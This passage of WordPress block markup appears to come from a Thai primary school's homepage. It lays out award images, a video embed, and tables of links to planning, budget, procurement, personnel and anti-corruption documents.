data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" 